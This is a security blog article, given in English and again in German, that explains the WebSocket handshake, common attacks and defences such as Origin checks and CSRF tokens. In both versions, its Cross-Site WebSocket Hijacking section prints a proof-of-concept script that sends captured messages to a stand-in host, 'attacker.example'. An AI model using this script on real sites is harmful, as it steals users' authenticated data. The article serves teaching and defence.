WebSockets - Attack Techniques and Protection Measures

WebSockets

Attack Techniques and Protection Measures

Michael Schneider
by Michael Schneider
on April 08, 2021
time to read: 8 minutes

Keypoints

How to handle WebSockets Security

  • WebSockets allow bidirectional and asynchronous communication
  • Known HTTP vulnerabilities also apply to WebSockets
  • WebSockets can be established over TLS-encrypted connections
  • Origin header verification, input validation and output encoding protect against attacks
  • Cross-Site WebSocket Hijacking can be prevented by using CSRF-like tokens/nonces

The article RFC 6455 – The WebSocket Protocol defines WebSockets as a protocol for bi-directional communication between client and server. Usually the client is a web application in JavaScript and the server is a web server that supports WebSocket connections. The protocol is based on TCP and is initiated with a handshake. Unlike HTTP, the connection between client and server is kept open and messages can be sent in both directions as well as asynchronously.

WebSockets are widely used where, among other things, low latency or server initiated messages are required, for example in the case of a chat or real-time message feeds such as the transmission of financial data. There is no restriction on what data is transmitted in what form in messages over WebSockets. JSON is often used as a data format in web applications. The WebSocket protocol supports unencrypted connections (ws://) as well as encrypted communication via TLS (wss://).

Since WebSockets is an alternative form of communication to HTTP, but otherwise has similar functionality, the protocol is also affected by known HTTP vulnerabilities. In this article we describe how a WebSocket connection is established, what typical attack techniques are and what security measures exist.

Establishing a WebSocket

To establish a WebSocket communication, the client and the WebSocket server perform a handshake. The sample code establishes a WebSocket connection, and then sends a message with the content ping to the server.

<script>
  var websocket = new WebSocket('wss://server.example.org');
  websocket.onopen = sendping();

  function sendping() {
    websocket.send('ping');
  }
</script>

The browser automatically sends a handshake as an HTTP request to initiate the WebSocket connection.

GET /chat HTTP/1.1
Host: server.example.org
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Key: VGhlQW5zd2VyaXM0Mi4K
Origin: http://example.org
Sec-WebSocket-Version: 13

This is a simple form of the request that is performed without authentication. When the server accepts the request, it sends the following response to successfully complete the handshake.

HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: y/+ilX15b3jDgSQlfeKszFt8ntI=

The Sec-WebSocket-Key header in the client request contains a Base64-encoded value that should be randomly generated for each request. The Sec-WebSocket-Accept response header contains a hash of the transmitted value of the Sec-WebSocket-Key header, created according to WebSocket protocol defaults. These headers are not a security function. These headers were introduced to prevent servers from having to accept connections from clients that do not support WebSockets and still send requests to the WebSocket server. This can include misconfigured caching proxy servers.

Now the WebSocket channel has been opened. How the communication and the processing of the messages looks like is the responsibility of the application, because the WebSocket protocol does not specify the form of the messages.

Attacks

In the OWASP Web Security Testing Guide, tests on WebSockets are documented under ID WSTG-CLNT-10. In this chapter we present some attack techniques that affect WebSockets on the one hand and are also possible with WebSockets on the other hand.

Unauthorized access to WebSocket communication

If a WebSocket communication is not established using the WebSockets over TLS (wss://) protocol, it is possible to read and manipulate the communication at the network level. Attackers must be in a privileged position in the network to do this.

No form of authentication and authorization is specified for WebSockets. If no authentication is required to establish the WebSocket, attackers can establish their own connections and possibly access data that can only be accessed authenticated via HTTP. If access rights are also not checked within a WebSocket connection, attackers can gain unauthorized access to data by sending WebSocket messages.

Code injection

Messages sent over WebSockets can be misused to inject code. Depending on how messages are processed in the application, it is also possible to carry out attacks via WebSockets such as SQL injection or XML-based attacks, among others. Client-side attacks such as Cross Site Scripting (XSS) are also possible if the content of messages is insufficiently checked and embedded in the web application without encoding. If an attacker gains control of the WebSocket connection, they can manipulate messages from the client to the server and vice versa, abusing existing vulnerabilities to execute malicious code.

Cross-Site WebSocket Hijacking

The Cross-Site WebSocket Hijacking (CSWSH) attack exploits a Cross-Site Request Forgery Vulnerability (CSRF) in the WebSocket handshake. Attackers can connect to the vulnerable application under their own domain. When users open the attackers’ site, a WebSocket is established in the context of the user’s privilege. Attackers can then communicate with the application through the WebSocket connection and also gain access to the server’s responses. This is not usual for a CSRF attack.

A CSWSH attack allows attackers to send and receive messages on behalf of the user. Depending on the application purpose, establishing a WebSocket channel may also be sufficient to receive and analyse messages without further interaction. The following proof-of-concept script for a CSWSH attack includes JavaScript code for opening a WebSocket and extracting received messages. The script is executed in the attacker’s origin.

<script>
  // create a websocket connection to the target application
  var websocket = new WebSocket('wss://target.example');

  // wait for a message and exfiltrate the data
  websocket.onmessage = function(event) {
    var xhr = new XMLHttpRequest();

    xhr.open('POST', 'attacker.example', true);
    xhr.send(event.data);
  }
</script>

When users access the attacker’s crafted page, the web browser performs the WebSocket handshake and also sends the cookies along, analogous to a CSRF attack. If authentication based only on a session token cookie is required to open a WebSocket, this example bypasses it.

Protective measures

When using WebSockets, the following protective measures should be observed.

When using WebSockets, the same principle applies as in classic web applications, that incoming data should not be trusted and must be validated accordingly. This applies to headers during the handshake as well as to the transmitted messages in both directions. In order to prevent cross-site WebSocket hijacking attacks, an origin header check should be performed and some form of CSRF token introduced.

Conclusion

Unlike HTTP, the WebSocket protocol preserves the connection, allowing asynchronous transmission of messages in both directions. When using WebSockets, similar vulnerabilities occur as in HTTP. If an encrypted connection is not established or authentication is not fully enforced, unauthorized access to transmitted data is possible. If no validation is performed when processing the content of messages, this leads to the execution of malicious code. There is also the possibility for cross-origin attacks during the initialization of a WebSocket connection. However, suitable protective measures exist for all the attacks described, so that WebSockets can also be operated securely.

About the Author

Michael Schneider

Michael Schneider has been in IT since 2000. Since 2010 he is focused on information security. He is an expert at penetration testing, hardening and the detection of vulnerabilities in operating systems. He is well-known for a variety of tools written in PowerShell to find, exploit, and mitigate weaknesses. (ORCID 0000-0003-0772-9761)

Links

You want to test the security of your firewall?

Our experts will get in contact with you!

×
Farewell NTLM

Farewell NTLM

Michael Schneider

ContainerKitty

ContainerKitty

Michael Schneider

HardeningKitty Score

HardeningKitty Score

Michael Schneider

HTTP Response Header

HTTP Response Header

Michael Schneider

You want more?

Further articles available here

You need support in such a project?

Our experts will get in contact with you!

You want more?

Further articles available here

WebSockets - Angriffstechniken und Schutzmassnahmen

WebSockets

Angriffstechniken und Schutzmassnahmen

Michael Schneider
von Michael Schneider
am 08. April 2021
Lesezeit: 8 Minuten

Keypoints

So gehen Sie sicher mit WebSockets um

  • WebSockets ermöglichen eine bidirektionale und asynchrone Kommunikation
  • Bekannte HTTP-Schwachstellen gelten auch für WebSockets
  • WebSockets können über mittels TLS verschlüsselte Verbindungen aufgebaut werden
  • Die Überprüfung des Origin-Headers sowie eine Inputvalidierung und Ausgabekodierung schützt vor Angriffen
  • Cross-Site WebSocket Hijacking kann durch den Einsatz von CSRF-ähnlichen Token/Nonces verhindert werden

Der Artikel RFC 6455 – The WebSocket Protocol definiert WebSockets als Protokoll für die bidirektionale Kommunikation zwischen Client und Server. Meist handelt es sich beim Client um eine Webanwendung in JavaScript und als Server wird ein Webserver eingesetzt, der WebSocket-Verbindungen unterstützt. Das Protokoll basiert auf TCP und wird mit einem Handshake initiiert. Im Gegensatz zu HTTP wird die Verbindung zwischen Client und Server offen gehalten und es können Nachrichten in beide Richtungen sowie asynchron gesendet werden.

WebSockets sind weit verbreitet und werden unter anderem dort eingesetzt, wo eine geringe Latenz oder vom Server initiierte Nachrichten erforderlich sind, beispielsweise im Falle eines Chats oder Echtzeit-Nachrichtenfeeds wie die Übermittlung von Finanzdaten. Es existiert keine Einschränkung welche Daten in welcher Form in Nachrichten über WebSockets übermittelt werden. Im Bereich von Webanwendungen wird oft JSON als Datenformat genutzt. Das WebSocket-Protokoll unterschützt unverschlüsselte Verbindungen (ws://) sowie verschlüsselte Kommunikation über TLS (wss://).

Da WebSockets eine alternative Form der Kommunikation zu HTTP darstellt, aber ansonsten ähnliche Funktionalität aufweist, ist das Protokoll auch von bekannten HTTP-Schwachstellen betroffen. In diesem Artikel beschreiben wir, wie eine WebSocket-Verbindung aufgebaut wird, welches typische Angriffstechniken sind und welche Sicherheitsmassnahmen existieren.

Aufbau eines WebSockets

Um eine WebSocket-Kommunikation aufzubauen, führen Client und der WebSocket-Server einen Handshake durch. Der Beispielcode baut eine WebSocket-Verbindung auf, und sendet danach eine Nachricht mit dem Inhalt ping an den Server.

<script>
  var websocket = new WebSocket('wss://server.example.org');
  websocket.onopen = sendping();

  function sendping() {
    websocket.send('ping');
  }
</script>

Der Browser sendet dabei automatisch einen Handshake als HTTP-Request, um die WebSocket-Verbindung zu initiieren.

GET /chat HTTP/1.1
Host: server.example.org
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Key: VGhlQW5zd2VyaXM0Mi4K
Origin: http://example.org
Sec-WebSocket-Version: 13

Dabei handelt es sich um eine einfache Form der Anfrage, die ohne Authentisierung durchgeführt wird. Wenn der Server die Anfrage akzeptiert, sendet er die folgende Antwort, um den Handshake erfolgreich abzuschliessen.

HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: y/+ilX15b3jDgSQlfeKszFt8ntI=

Der Header Sec-WebSocket-Key in der Client-Anfrage enthält einen Base64-kodierten Wert, der für jede Anfrage zufällig generiert werden sollte. Der Response-Header Sec-WebSocket-Accept enthält einen nach Vorgabe des WebSocket-Protokolls erstellten Hash des übermittelten Werts des Headers Sec-WebSocket-Key. Bei diesen Headern handelt es sich um keine Sicherheitsfunktion. Diese Header wurden eingeführt, um zu vermeiden, dass Server nicht Verbindungen von Clients annehmen müssen, die keine Unterstützung für WebSockets haben und trotzdem Requests an den WebSocket-Server senden. Dabei kann es sich unter anderem um falsch konfigurierte Caching-Proxy-Server handeln.

Nun wurde der WebSocket-Kanal geöffnet. Wie die Kommunikation und die Verarbeitung der Nachrichten aussieht, liegt in der Verantwortung der Applikation, da das WebSocket-Protokoll keine Vorgaben an die Form der Nachrichten vorgibt.

Angriffe

Im OWASP Web Security Testing Guide werden Tests zu WebSockets unter der ID WSTG-CLNT-10 dokumentiert. In diesem Kapitel stellen wir einige Angriffstechniken vor, die einerseits WebSockets betreffen und andererseits auch mit WebSockets möglich sind.

Unberechtigter Zugriff auf WebSocket-Kommunikation

Wenn eine WebSocket-Kommunikation nicht über das Protokoll WebSockets over TLS (wss://) aufgebaut wird, ist es möglich die Kommunikation auf Netzwerkebene mitzulesen und zu manipulieren. Angreifer müssen sich dabei in einer privilegierten Position im Netzwerk befinden.

Es ist keine Form der Authentisierung und Autorisierung für WebSockets vorgegeben. Wenn für den Aufbau des WebSockets keine Authentisierung notwendig ist, können Angreifer eigene Verbindungen aufbauen und gegebenenfalls auf Daten zugreifen, die über HTTP nur authentisiert zugänglich ist. Wenn innerhalb einer WebSocket-Verbindung auch keine Zugriffsrechte überprüft werden, können Angreifer unberechtigter Weise an Daten durch das Senden von WebSocket-Nachrichten gelangen.

Code-Injection

Nachrichten, die über WebSockets gesendet werden, können zum Einschleusen von Code missbraucht werden. Je nachdem wie Nachrichten in der Applikation verarbeitet werden, ist es auch über WebSockets möglich Angriffe wie unter anderem SQL-Injection oder XML-basierte Attacken durchzuführen. Auch client-seitige Angriffe wie Cross Site Scripting (XSS) sind möglich, wenn der Inhalt von Nachrichten unzureichend geprüft und ohne Kodierung in die Webanwendung eingebettet wird. Wenn ein Angreifer Kontrolle über die WebSocket-Verbindung gelangt, kann dieser Nachrichten vom Client zum Server und umgekehrt manipulieren und so vorhandene Schwachstellen zur Ausführung von Schadcode missbrauchen.

Cross-Site WebSocket Hijacking

Der Angriff Cross-Site WebSocket Hijacking (CSWSH) nutzt eine Cross-Site-Request-Forgery-Schwachstelle (CSRF) beim WebSocket-Handshake aus. Angreifer können unter ihrer eigenen Domain eine Verbindung zur verwundbaren Applikation aufbauen. Wenn Benutzer die Seite der Angreifer öffnen, wird ein WebSocket im Kontext der Rechte des Benutzers aufgebaut. Angreifer können dann über die WebSocket-Verbindung mit der Applikation kommunizieren und erhalten zusätzlich auch Zugriff auf die Antworten des Servers. Dies ist bei einem CSRF-Angriff ansonsten nicht üblich.

Eine CSWSH-Attacke ermöglicht es Angreifern im Namen des Benutzers Nachrichten zu senden und empfangen. Je nach Anwendungszweck reicht auch der Aufbau eines WebSocket-Kanals aus, um ohne weitere Interaktion Nachrichten zu empfangen und auszuwerten. Das folgende Proof-of-Concept-Skript für eine CSWSH-Attacke beinhaltet JavaScript-Code für das Öffnen eines WebSockets und zur Extrahierung von erhaltenen Nachrichten. Das Skript wird im Origin des Angreifers ausgeführt.

<script>
  // create a websocket connection to the target application
  var websocket = new WebSocket('wss://target.example');

  // wait for a message and exfiltrate the data
  websocket.onmessage = function(event) {
    var xhr = new XMLHttpRequest();

    xhr.open('POST', 'attacker.example', true);
    xhr.send(event.data);
  }
</script>

Wenn Benutzer auf die präparierte Seite des Angreifers zugreifen, führt der Webbrowser den WebSocket-Handshake durch und sendet dabei auch die Cookies analog zu einer CSRF-Attacke mit. Falls für das Öffnen eines WebSockets eine Authentisierung nur auf Basis eines Session Token Cookie notwendig ist, wird diese mit diesem Beispiel umgangen.

Schutzmassnahmen

Bei der Verwendung von WebSockets sollten die folgenden Schutzmassnahmen beachtet werden.

Bei der Verwendung von WebSockets gilt dasselbe Prinzip wie bei klassischen Webanwendungen, dass eingehenden Daten nicht vertraut werden soll, und diese entsprechend überprüft werden müssen. Dies gilt für Header beim Handshake wie auch für die übermittelten Nachrichten in beide Richtungen. Damit Cross-Site-WebSocket-Hijacking-Angriffe verhindert werden können, sollte eine Prüfung des Origin-Headers durchgeführt und eine Form von CSRF-Token eingeführt werden.

Fazit

Im Unterschied zu HTTP bleibt beim WebSocket-Protokoll die Verbindung erhalten und ermöglicht so eine asynchrone Übertragung von Nachrichten in beide Richtungen. Bei der Verwendung von WebSockets treten ähnliche Schwachstellen wie in HTTP auf. Wenn keine verschlüsselte Verbindung aufgebaut oder die Authentisierung nicht vollständig durchgesetzt wird, ist unbefugter Zugriff auf übermittelte Daten möglich. Wenn bei der Verarbeitung des Inhalts von Nachrichten keine Prüfung erfolgt, führt dies zur Ausführung von Schadcode. Zudem besteht die Möglichkeit für Cross-Origin-Angriffe während der Initialisierung einer WebSocket-Verbindung. Für alle beschriebenen Angriffe existieren jedoch passende Schutzmassnahmen, sodass WebSockets auch sicher betrieben werden können.

Über den Autor

Michael Schneider

Michael Schneider arbeitet seit dem Jahr 2000 in der IT. Im Jahr 2010 hat er sich auf die Informationssicherheit spezialisiert. Zu seinen Aufgaben gehören das Penetration Testing, Hardening und das Aufspüren von Schwachstellen in Betriebssystemen. Er ist bekannt für eine Vielzahl in PowerShell geschrieber Tools zum Finden, Ausnutzen und Beheben von Schwachstellen. (ORCID 0000-0003-0772-9761)

Links

Sie wollen die Sicherheit Ihrer Firewall prüfen?

Unsere Spezialisten kontaktieren Sie gern!

×
HardeningKitty Score

HardeningKitty Score

Michael Schneider

HTTP Response Header

HTTP Response Header

Michael Schneider

HardeningKitty

HardeningKitty

Michael Schneider

Sie wollen mehr?

Weitere Artikel im Archiv

Sie brauchen Unterstützung bei einem solchen Projekt?

Unsere Spezialisten kontaktieren Sie gern!

Sie wollen mehr?

Weitere Artikel im Archiv